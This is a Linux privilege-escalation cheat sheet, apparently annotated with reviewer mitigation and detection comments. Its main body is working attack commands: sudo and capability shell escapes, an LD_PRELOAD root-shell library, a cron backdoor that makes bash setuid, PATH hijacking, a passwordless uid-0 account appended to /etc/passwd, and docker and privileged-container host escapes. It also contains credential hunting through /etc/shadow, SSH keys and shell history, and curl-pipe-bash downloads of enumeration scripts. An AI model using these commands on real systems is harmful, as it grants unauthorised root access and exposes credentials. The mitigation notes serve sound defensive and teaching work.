
Linux Privilege Escalation

Enumeration First

# Host identity: kernel build string, distribution release, compiler/build info
uname -a
cat /etc/os-release /proc/version

# Who the current shell is and what it is already allowed to do
id; whoami
sudo -l            # sudo rules granted to this account (may prompt for a password)

# Local accounts and group membership
cat /etc/passwd
cat /etc/shadow    # readable only by root (or the shadow group on some distros); expect a permission error otherwise
cat /etc/group

# Sessions: who is on the box now, what they are doing, and recent logins
who; w; last

SUID / SGID Binaries

# SUID: set-user-ID bit on regular files
find / -type f -perm -u=s 2>/dev/null

# SGID: set-group-ID bit on regular files
find / -type f -perm -g=s 2>/dev/null

# Either bit set
find / -type f -perm /6000 2>/dev/null

# Compare the result against the distribution's default set: a custom,
# recently modified or non-package binary with these bits is the item worth
# explaining. GTFOBins documents how well-known binaries behave when run
# with elevated bits: https://gtfobins.github.io/

Sudo Abuse

# List sudo rights
# Every rule printed here is a finding in its own right: a program that can
# spawn a shell, open an editor or write arbitrary files is a full root grant
# regardless of what the rule was meant to allow.
sudo -l

# Common abusable sudo entries (check GTFOBins)
# Mitigation: pin the rule to fixed arguments, add the NOEXEC tag where the
# program itself is needed but its child processes are not, or replace the
# grant with a purpose-built wrapper script.
sudo find . -exec /bin/bash \;
sudo vim -c '!bash'
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo awk 'BEGIN {system("/bin/bash")}'
sudo less /etc/passwd   # then: !/bin/bash
sudo man man            # then: !/bin/bash

# env_keep and LD_PRELOAD
# If sudo -l shows: env_keep+=LD_PRELOAD
# Mitigation: keep the default env_reset and never add LD_PRELOAD or
# LD_LIBRARY_PATH to env_keep. As written, only the find invocation is a sudo
# event; the shell spawned by the library is not, so sudo's own log
# under-reports this path.
cat > /tmp/priv.c << EOF
#include <stdio.h>
#include <stdlib.h>
void _init() { setuid(0); system("/bin/bash"); }
EOF
# -nostartfiles keeps the toolchain's own _init out of the link, so the
# function above becomes the shared object's initialiser.
gcc -fPIC -shared -nostartfiles -o /tmp/priv.so /tmp/priv.c
sudo LD_PRELOAD=/tmp/priv.so find

Cron Jobs

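# System-wide cron: the main table plus every drop-in directory.
# The original listed only cron.d and cron.daily; hourly/weekly/monthly are
# run the same way and were missed. -la shows owner and mode, which is what
# decides whether an entry can be tampered with; /etc/crontab and /etc/cron.d
# lines carry their own user field.
cat /etc/crontab
ls -la /etc/cron.d/ /etc/cron.hourly/ /etc/cron.daily/ /etc/cron.weekly/ /etc/cron.monthly/ 2>/dev/null

# Per-user tables: the current user's, and root's if it happens to be readable.
crontab -l
cat /var/spool/cron/crontabs/root 2>/dev/null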

# Check for writable scripts run by root cron
# If a cron job runs a writable script:
# Mitigation: scripts referenced from cron, and every directory on their
# path, must be root-owned and not group/world-writable. A file-integrity
# monitor on the cron directories and the referenced scripts catches the
# appended line below before the job next fires.
echo 'chmod +s /bin/bash' >> /path/to/script.sh
# Wait for cron, then:
# -p (privileged mode) stops bash from resetting the effective uid to the
# real uid at startup, which it would otherwise do for a setuid shell.
bash -p

Writable Files & Paths

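# World-writable files outside the pseudo-filesystems.
# The original filtered with `grep -v proc`, which also hid any real path
# containing the substring "proc" (e.g. a procmail config); pruning the mount
# points inside find is exact and avoids walking them at all.
find / \( -path /proc -o -path /sys \) -prune -o -writable -type f -print 2>/dev/null

# Writable directories, with the same pruning (the original listed /proc
# entries here too).
find / \( -path /proc -o -path /sys \) -prune -o -writable -type d -print 2>/dev/null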

# PATH hijacking
# If a SUID binary calls a command without full path:
# Mitigation: a setuid program must invoke helpers by absolute path and set
# PATH itself (or drop privileges) before any exec; the loader's setuid
# hardening only covers LD_* variables, not PATH.
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
./vulnerable_suid_binary

# Writable /etc/passwd
# Add root user: new:x:0:0:root:/root:/bin/bash
# Mitigation: /etc/passwd must be root-owned and mode 0644. A second uid-0
# entry is an unambiguous detection signal for any baseline comparison or
# integrity check of the file.
echo 'hacked::0:0:root:/root:/bin/bash' >> /etc/passwd
su hacked

Capabilities

# Find binaries with capabilities
# The entries that matter are capabilities granted to an interpreter or a
# general-purpose tool rather than to the single service binary that needs it.
getcap -r / 2>/dev/null

# Common exploitable capabilities
# cap_setuid+ep on python3:
# Mitigation: never assign cap_setuid, cap_sys_admin or cap_dac_* to an
# interpreter; grant the minimal capability to a dedicated wrapper binary.
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# cap_net_raw+ep → sniff traffic
# cap_dac_read_search+ep → read any file

Kernel Exploits

# Get kernel version
uname -r

# Search for exploits
# Check the distribution's security advisories as well: distro kernels carry
# backported fixes, so the upstream version string alone over-reports.
searchsploit linux kernel 4.4
# OR use: https://github.com/mzet-/linux-exploit-suggester

# Download and run suggester
# NOTE(review): curl | bash executes whatever the remote host serves, with no
# integrity check and no chance to read it first; fetch to a file and review
# it before running.
curl -s https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash

Password Files & Sensitive Data

# Config files with passwords (case-sensitive substring matches)
grep -r 'password' /etc/ 2>/dev/null
grep -r 'passwd' /var/www/ 2>/dev/null
grep -rnE 'DB_PASS|db_password|SECRET' /var/www/ 2>/dev/null

# SSH keys and shell history
find / -name id_rsa 2>/dev/null
find / -name '*.pem' 2>/dev/null
cat ~/.bash_history

# Web server configs
# Credentials belong in a root-only include or a secrets store, not in a
# config that every local account can read.
cat /etc/apache2/sites-enabled/*.conf
cat /etc/nginx/sites-enabled/*

Docker / LXC Escape

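# Check if in container
# grep reads the file directly (the original piped cat into it). On a
# cgroup v2 host /proc/1/cgroup may not mention docker at all, so the
# marker file is the second signal rather than a fallback.
grep docker /proc/1/cgroup 2>/dev/null
ls -la /.dockerenv 2>/dev/null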

# If in docker group
# Membership of the docker group is equivalent to root on the host: the
# daemon runs as root and bind-mounts any host path it is asked to.
# Mitigation: treat docker group membership as a sudo grant, or use rootless
# Docker / a socket proxy that rejects mounts and privileged options.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Privileged container escape
# --privileged exposes the host's block devices, so the root disk can be
# mounted from inside. Mitigation: replace --privileged with the specific
# capabilities and devices the workload needs; the default device cgroup
# allowlist blocks this otherwise.
mount /dev/sda1 /mnt
chroot /mnt

Automated Tools

# LinPEAS (most comprehensive)
# NOTE(review): same curl | bash pattern as the exploit-suggester line: no
# integrity check on what is executed. The script is also noisy — it
# typically reads a large number of files in a short window, which is the
# access pattern a file-access audit rule is tuned to catch.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash

# LinEnum
# NOTE(review): flag meanings are not verifiable from this page; confirm
# -k/-r/-e/-t against the pinned version's help output.
./LinEnum.sh -s -k password -r report -e /tmp/ -t

# Linux Smart Enumeration
./lse.sh -l 1    # level 1 (default)
./lse.sh -l 2    # level 2 (more verbose)